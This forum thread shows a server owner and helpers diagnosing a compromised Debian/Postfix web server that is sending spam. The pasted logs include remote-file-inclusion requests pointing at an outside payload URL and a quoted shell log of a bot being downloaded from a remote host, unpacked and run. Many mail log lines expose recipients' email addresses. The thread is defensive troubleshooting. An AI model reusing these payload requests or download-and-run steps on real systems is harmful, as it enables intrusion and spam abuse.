postfix high number of connections

poshta

Hello, I have a problem with Postfix. Since this morning it has been sending mails constantly and the load average is at times at 7; right now it is at 4. A Linux friend takes care of the server, but he is currently not reachable (honeymoon in Switzerland). Now I'm faced with the problem, and I'm not experienced with Linux, apart from using the console.

I have been able to localise the problem so far: a Joomla CMS for a private project, namely a radio station with SAM Broadcaster. I have set the chmod for this user completely to 000.

As soon as I stop Postfix, the load drops to a normal 0.2. When I start Postfix again, it rises to a constant 4.2 or more.

Can you help me get to the bottom of the problem? I will post all the logs you need; that way I hope to get to the bottom of it.

Server details: Debian, Confixx, Postfix, SpamAssassin.

This is what I notice in the Apache logs:
Code:
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET //?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 286 "-" "Mozilla/5.0" "-"
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET /samPHPweb/playlist-add.php//?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 313 "-" "Mozilla/5.0" "-"
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET /samPHPweb//?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 296 "-" "Mozilla/5.0" "-"
213.133.113.82 - - [03/Apr/2009:18:53:33 +0200] "GET / HTTP/1.1" 200 1049 "-" "-" "-"

tail -f /var/log/mail.info:
Code:
Apr  3 17:03:00 force postfix/master[10718]: daemon started -- version 2.3.3, configuration /etc/postfix
Apr  3 17:03:04 force postfix/smtpd[10728]: connect from unknown[117.197.219.28]
Apr  3 17:03:07 force postfix/smtpd[10728]: 430E1300CE3: client=unknown[117.197.219.28]
Apr  3 17:03:07 force postfix/smtpd[10731]: warning: 190.29.7.43: address not listed for hostname adsl190-29-7-43.une.net.co
Apr  3 17:03:07 force postfix/smtpd[10731]: connect from unknown[190.29.7.43]
Apr  3 17:03:07 force postfix/qmgr[10721]: E9A7C301F5F: from=<>, size=5807, nrcpt=1 (queue active)
Apr  3 17:03:07 force postfix/qmgr[10721]: 8A02A301265: from=<>, size=5801, nrcpt=1 (queue active)
Apr  3 17:03:07 force postfix/qmgr[10721]: 48323301261: from=<>, size=5899, nrcpt=1 (queue active)

This is only a part; it goes on endlessly:
Code:
Apr  3 19:14:15 force postfix/smtp[20725]: 477C02C6B12: to=<caretakersiteagent@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107864, delays=107847/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20724]: 4BF0A2C7E4F: to=<nicolasouthern85@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108217, delays=108200/17/0.23/0.19, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20754]: 4E7822C7E4B: to=<obymuoneke@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108252, delays=108235/17/0.22/0.19, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20768]: 4BB502CC4AA: to=<tonih16@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=3, delay=99647, delays=99630/17/0.04/0.41, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20750]: 47E6C2C52C3: to=<kay.dicks@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=7, delay=111157, delays=111138/19/0.05/0.38, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20743]: 4B18D2C4989: to=<kerrydoran@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=7, delay=111193, delays=111174/19/0.05/0.38, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20756]: 470C32C7805: to=<tregellauk2003@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=5, delay=99727, delays=99710/17/0.05/0.27, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20732]: 4A1CE2C4CB3: to=<june_health@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=3, delay=112064, delays=112047/17/0.05/0.26, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20757]: 4CF122C7B32: to=<tiggertc79@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=4, delay=99685, delays=99668/17/0.04/0.23, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20787]: 457D02C7B8F: to=<nettibetti3@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=5, delay=108333, delays=108316/17/0.03/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20789]: 473192C5254: to=<kaylewis@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, conn_use=2, delay=111257, delays=111238/19/0.03/0.32, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20734]: 4CEC72C4FBA: to=<neo19834@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=4, delay=108337, delays=108320/17/0.03/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20759]: 4E5092C7DBD: to=<onepinkbit@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108237, delays=108220/17/0.09/0.07, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20855]: 46C782C4209: to=<katiekadriu@btinternet.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, conn_use=2, delay=111175, delays=111156/19/0.05/0.26, dsn=5.0.0, status=bounced (host mx2.talk21.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20764]: 4504C2C7C8E: to=<nurseryshell@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=2, delay=108259, delays=108243/17/0.03/0.06, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20735]: 4D0292C51A3: to=<kath.williams1964@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=2, delay=111202, delays=111183/19/0.05/0.29, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20694]: 4E4712C5101: to=<kenneth.young2@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, conn_use=2, delay=111294, delays=111275/19/0.03/0.32, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20744]: 47C382C4C68: to=<inesbei@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=4, delay=112062, delays=112045/17/0.04/0.26, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20785]: 534762C60AF: to=<lesley.jennings@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.12.12.192]:25, delay=110280, delays=110264/16/0.69/0.34, dsn=5.0.0, status=bounced (host mx2.talk21.mail.yahoo.com[217.12.12.192] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20692]: 45A3730091C: to=<karmail@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, delay=110672, delays=110652/19/0.66/0.33, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20748]: 54F872C406A: to=<jane.hollis@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, delay=113350, delays=113334/16/0.67/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20690]: 435772C55CA: to=<kathbentley@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=110656, delays=110636/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20765]: 41A6A3005F8: to=<joanbath@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=112328, delays=112309/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20726]: 5B7862C4018: to=<jacqui.westwood@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, delay=113356, delays=113340/16/0.63/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20691]: 4B91F2C6C1B: to=<chanty_j@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, delay=107864, delays=107846/17/0.29/0.35, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20747]: 4274E2C54C3: to=<kay.cleeter@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=111067, delays=111047/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20696]: 493502C7C05: to=<cjajones1@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238v.177.142]:25, delay=107861, delays=107844/17/0.28/0.24, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20782]: 592D5300378: to=<j.burnel@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.12.12.192]:25, delay=113459, delays=113443/16/0.5/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.12.12.192] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20749]: 4B7152C6A50: to=<boxerkev@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107865, delays=107848/17/0.24/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20752]: 48C612C7BF6: to=<nicholamullen83@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, delay=108323, delays=108305/17/0.28/0.25, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20731]: 496C32C6A07: to=<bikerbabe20042003@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107866, delays=107849/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20736]: 4AA7B300913: to=<karin.lake@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=110675, delays=110655/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20751]: 4A4C22C67D2: to=<apoc62368@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107869, delays=107851/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20790]: 4276B2C518D: to=<kelsey99@btinternet.com>, relay=mx1.talk21.mail.yahoo.com[195.50.106.135]:25, conn_use=5, delay=111297, delays=111278/19/0.04/0.35, dsn=5.0.0, status=bounced (host mx1.talk21.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20753]: 4357F2C6A06: to=<beverley.chaplin@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107866, delays=107849/17/0.23/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/local[20905]: 06CB8300540: to=<www-data@SERVER-IP>, relay=local, delay=19, delays=0.24/16/0/3.2, dsn=2.0.0, status=sent (delivered to command: procmail -a "$EXTENSION")
Apr  3 19:14:15 force postfix/smtp[20695]: 409422CC68E: to=<troon71@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=5, delay=99628, delays=99611/17/0.05/0.23, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/cleanup[20914]: 207AB30095B: message-id=<20090403171415.207AB30095B@SERVER-IP>
 
Look for suspicious directories in /tmp such as ... or .something; you only see them with ls -lisa. It looks like your server is being abused for sending spam. Also go through the process list with ps aux to see whether there is anything unknown in it, or post it here.
 
under /tmp
two hidden directories
.ICE-unix with 777
.X11-unix with 777 but without content.
(I have just deleted them)

root@force:/tmp# ps aux
Code:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1740   564 ?        Ss   16:45   0:01 /sbin/init splash
root         2  0.0  0.0      0     0 ?        S    16:45   0:00 [migration/0]
root         3  0.0  0.0      0     0 ?        SN   16:45   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    16:45   0:00 [watchdog/0]
root         5  0.0  0.0      0     0 ?        S    16:45   0:00 [migration/1]
root         6  0.0  0.0      0     0 ?        SN   16:45   0:00 [ksoftirqd/1]
root         7  0.0  0.0      0     0 ?        S    16:45   0:00 [watchdog/1]
root         8  0.0  0.0      0     0 ?        S<   16:45   0:00 [events/0]
root         9  0.0  0.0      0     0 ?        S<   16:45   0:00 [events/1]
root        10  0.0  0.0      0     0 ?        S<   16:45   0:00 [khelper]
root        11  0.0  0.0      0     0 ?        S<   16:45   0:00 [kthread]
root        14  0.0  0.0      0     0 ?        S<   16:45   0:00 [kblockd/0]
root        15  0.0  0.0      0     0 ?        S<   16:45   0:00 [kblockd/1]
root        16  0.0  0.0      0     0 ?        S<   16:45   0:00 [kacpid]
root        17  0.0  0.0      0     0 ?        S<   16:45   0:00 [kacpi_notify]
root       101  0.0  0.0      0     0 ?        S<   16:45   0:00 [kseriod]
root       134  0.0  0.0      0     0 ?        S    16:45   0:00 [pdflush]
root       135  0.0  0.0      0     0 ?        S    16:45   0:00 [pdflush]
root       136  0.0  0.0      0     0 ?        S    16:45   0:00 [kswapd0]
root       137  0.0  0.0      0     0 ?        S<   16:45   0:00 [aio/0]
root       138  0.0  0.0      0     0 ?        S<   16:45   0:00 [aio/1]
root       766  0.0  0.0      0     0 ?        S    16:45   0:00 [kirqd]
root      1694  0.0  0.0      0     0 ?        S<   16:45   0:00 [khubd]
root      1968  0.0  0.0      0     0 ?        S<   16:45   0:11 [md0_raid1]
root      2102  0.1  0.0      0     0 ?        S<   16:45   0:24 [kjournald]
root      2264  0.0  0.0   2308   620 ?        S<s  16:45   0:00 /sbin/udevd --daemon
root      3054  0.0  0.0      0     0 ?        S<   16:45   0:00 [shpchpd]
root      3077  0.0  0.0      0     0 ?        S<   16:45   0:00 [kpsmoused]
root      6090  0.0  0.0   1712   500 tty1     Ss+  16:45   0:00 /sbin/getty 38400 tty1
root      6091  0.0  0.0   1708   500 tty2     Ss+  16:45   0:00 /sbin/getty 38400 tty2
root      6092  0.0  0.0   1712   500 tty3     Ss+  16:45   0:00 /sbin/getty 38400 tty3
root      6093  0.0  0.0   1712   504 tty4     Ss+  16:45   0:00 /sbin/getty 38400 tty4
root      6094  0.0  0.0   1708   500 tty5     Ss+  16:45   0:00 /sbin/getty 38400 tty5
root      6095  0.0  0.0   1712   504 tty6     Ss+  16:45   0:00 /sbin/getty 38400 tty6
root      6123  0.4  0.0   1760   584 ?        Ss   16:45   0:56 /sbin/syslogd
root      6140  0.0  0.0   1860   516 ?        Ss   16:45   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
bind      6166  0.5  0.4  46288  9788 ?        Ssl  16:45   1:12 /usr/sbin/named -u bind
root      6183  0.0  1.1  26608 24076 ?        Ss   16:45   0:01 /usr/sbin/spamd --create-prefs --max-children 5 --helper-home-dir -d --pidfile=/var/run/spamd.pid
root      6201  0.1  0.2   9416  5964 ?        S    16:45   0:24 python /usr/sbin/denyhosts --daemon --config=/etc/denyhosts.conf --config=/etc/denyhosts.conf
root      6369  0.0  0.0   6696   840 ?        Ss   16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6371  0.0  0.0   6696   524 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6372  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6373  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6374  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6387  0.0  0.0   5256   948 ?        Ss   16:45   0:00 /usr/sbin/sshd
root      6399  0.0  0.0   3716   988 ?        Ss   16:45   0:00 /usr/sbin/vsftpd
root      6427  0.0  0.0   2416   844 ?        Ss   16:45   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive
root      6459  0.0  0.0   2092   708 ?        Ss   16:45   0:00 /sbin/mdadm --monitor --pid-file /var/run/mdadm.pid --mail root --daemonise --scan
daemon    6473  0.0  0.0   1984   420 ?        Ss   16:45   0:00 /usr/sbin/atd
root      6483  0.0  0.0   2320   900 ?        Ss   16:45   0:00 /usr/sbin/cron
root      6505  0.0  0.3  20832  8224 ?        S    16:45   0:00 /usr/sbin/apache
root      7535  0.0  0.1   8492  2868 ?        Ss   16:48   0:00 sshd: root@pts/0 
root      7655  0.0  0.0   4148  1820 pts/0    Ss   16:48   0:00 -bash
root     11427  0.0  0.0   1768   472 ?        S    17:29   0:00 /bin/sh -c /root/confixx/pipelog.pl
root     11428  0.0  0.0   3304  1436 ?        S    17:29   0:00 /usr/bin/perl /root/confixx/pipelog.pl
www-data 11429  0.0  0.4  24160 10020 ?        S    17:29   0:01 /usr/sbin/apache
www-data 11430  0.0  0.4  24184 10028 ?        S    17:29   0:01 /usr/sbin/apache
www-data 11431  0.0  0.5  25236 11780 ?        S    17:29   0:02 /usr/sbin/apache
www-data 11432  0.0  0.4  24448 10276 ?        S    17:29   0:04 /usr/sbin/apache
www-data 11433  0.0  0.4  24312 10204 ?        S    17:29   0:02 /usr/sbin/apache
www-data 11450  0.0  0.5  25148 11360 ?        S    17:30   0:01 /usr/sbin/apache
www-data 11452  0.0  0.4  24268 10104 ?        S    17:30   0:01 /usr/sbin/apache
www-data 11495  0.0  0.4  24040  9936 ?        S    17:33   0:01 /usr/sbin/apache
www-data 11496  0.0  0.5  25532 12048 ?        S    17:33   0:03 /usr/sbin/apache
www-data 11497  0.0  0.5  25212 11480 ?        S    17:33   0:02 /usr/sbin/apache
root     12158  0.0  0.0   1772   516 pts/0    S    17:46   0:00 /bin/sh /usr/bin/mysqld_safe
mysql    12195  0.0  0.9 119648 19680 pts/0    Sl   17:46   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --p
nobody    1570  0.4  1.3  31892 28900 ?        S    18:23   0:30 spamd child
root      1684  0.0  1.2  29660 26656 ?        S    18:23   0:02 spamd child
root     24209  0.0  0.0   4964  1692 ?        Ss   19:56   0:00 /usr/lib/postfix/master
postfix  24210  0.0  0.0   4976  1676 ?        S    19:56   0:00 pickup -l -t fifo -u -c
postfix  24211  0.0  0.0   5012  1768 ?        S    19:56   0:00 qmgr -l -t fifo -u
postfix  24214  0.0  0.1   6844  3072 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24216  0.0  0.1   6848  3032 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24218  0.0  0.0   4980  1692 ?        S    19:56   0:00 anvil -l -t unix -u -c
postfix  24220  0.0  0.1   6848  3040 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24222  0.0  0.1   6844  3048 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24223  0.0  0.0   4988  1988 ?        S    19:56   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  24327  0.0  0.0   5040  2048 ?        S    20:01   0:00 cleanup -z -t unix -u -c
postfix  24405  0.0  0.0   4980  1704 ?        S    20:06   0:00 pipe -n spamassassin -t unix user=nobody argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f ${sender} ${recipient}
postfix  24409  0.0  0.0   5016  2036 ?        S    20:06   0:00 local -t unix
postfix  24420  0.0  0.0   5040  2048 ?        S    20:07   0:00 cleanup -z -t unix -u -c
669      24489  0.2  0.0   3916  1660 ?        Ss   20:11   0:01 in.qpopper -s
nobody   24663  0.0  0.0   4108  1100 ?        Ss   20:18   0:00 /usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f info@....com force13p1@server.....
root     24664  0.0  0.0   2644  1008 pts/0    R+   20:18   0:00 ps aux
 
.ICE-unix with 777
.X11-unix with 777 but without content.
Those two directories are harmless (deleting them does no harm in this case).

So far you haven't provided any usable facts from which one could conclude where the spam is coming from. The mails with "from=<>" are uninteresting. It would be more important to show the complete trace of one spam mail from connect to delivery. Hint: the internal message IDs such as E9A7C301F5F stay the same throughout processing. Furthermore, the things that are processed within one process (=> same PID "smtpd[10731]") belong together.
 
hello linux admin, could you please tell me which logs contain the information? thanks for your feedback
 
heh, yep.
a part of it as code; the file "mail.info" is almost 500 MB, the entries only from today ...

Code:
Apr  3 06:29:45 force postfix/qmgr[9731]: 91EBF6BFB02: to=<gailybear@hotmail.co.uk>, relay=none, delay=24956, delays=24956/0.12/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: from=<www-data@force.server.xx>, size=2000, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: to=<ganah@hotmail.co.uk>, relay=none, delay=24956, delays=24956/0.05/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9DCDB6BFB16: from=<www-data@force.server.xx>, size=2003, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9DCDB6BFB16: to=<garbutt3@hotmail.co.uk>, relay=none, delay=24955, delays=24955/0.04/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9008A6BFAE1: from=<www-data@force.server.xx>, size=2007, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9008A6BFAE1: to=<fredstrevens@hotmail.co.uk>, relay=none, delay=24958, delays=24958/0.04/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9422A6BFAEB: from=<www-data@force.server.xx>, size=4644, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9422A6BFAEB: to=<kathpollard@hotmail.co.uk>, relay=none, delay=24958, delays=24958/0.01/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9C3C26BEFC7: from=<www-data@force.server.xx>, size=4645, nrcpt=1 (queue active)
 
Keep an eye out for a hidden IRC bot/server on your machine.
Look for directories beginning with ",." or ".," and, if present, examine the folders /var/games and /var/spool/*. Search all /bin and /tmp directories for a file named "update". Examine all running cron jobs and especially the corresponding log file. Check all running processes for their source. "./run" = not good!


Code:
GET / HTTP/1.1" 200 1049 "-" "-" "-"
GET /samPHPweb//?commonpath=http://kashikicks.ru/fx29id.txt??
...
...

Install mod_security ;)

Study the Apache "error_log" and "access_log" very closely, 2 days back recursively, and search for the string ".tgz".

The following excerpt might be useful:

Code:
sh: line 1: cd: /var/spool/virtual: Datei oder Verzeichnis nicht gefunden
--2009-02-17 17:15:59--  http://moltodos.com/admin/boti/cyc.tgz
Auflösen des Hostnamen »moltodos.com«.... 174.132.116.5
Verbindungsaufbau zu moltodos.com|174.132.116.5|:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 964393 (942K) [application/x-tar]
cyc.tgz: Keine Berechtigung

Kann nicht nach »cyc.tgz« schreiben (Keine Berechtigung).
tar (Kind): cyc.tgz: Kann open nicht ausführen.: Datei oder Verzeichnis nicht gefunden
tar (Kind): Nicht behebbarer Fehler: Programmabbruch.
tar: Kindprozeß gab Status 2 zurück.
tar: Fehler beim Beenden, verursacht durch vorhergehende Fehler.
sh: line 1: cd: .,: Datei oder Verzeichnis nicht gefunden
sh: line 1: ./run: Datei oder Verzeichnis nicht gefunden

But then... later:

Code:
--2009-02-17 17:17:18--  http://moltodos.com/admin/boti/cyc.tgz
Auflösen des Hostnamen »moltodos.com«.... 174.132.116.5
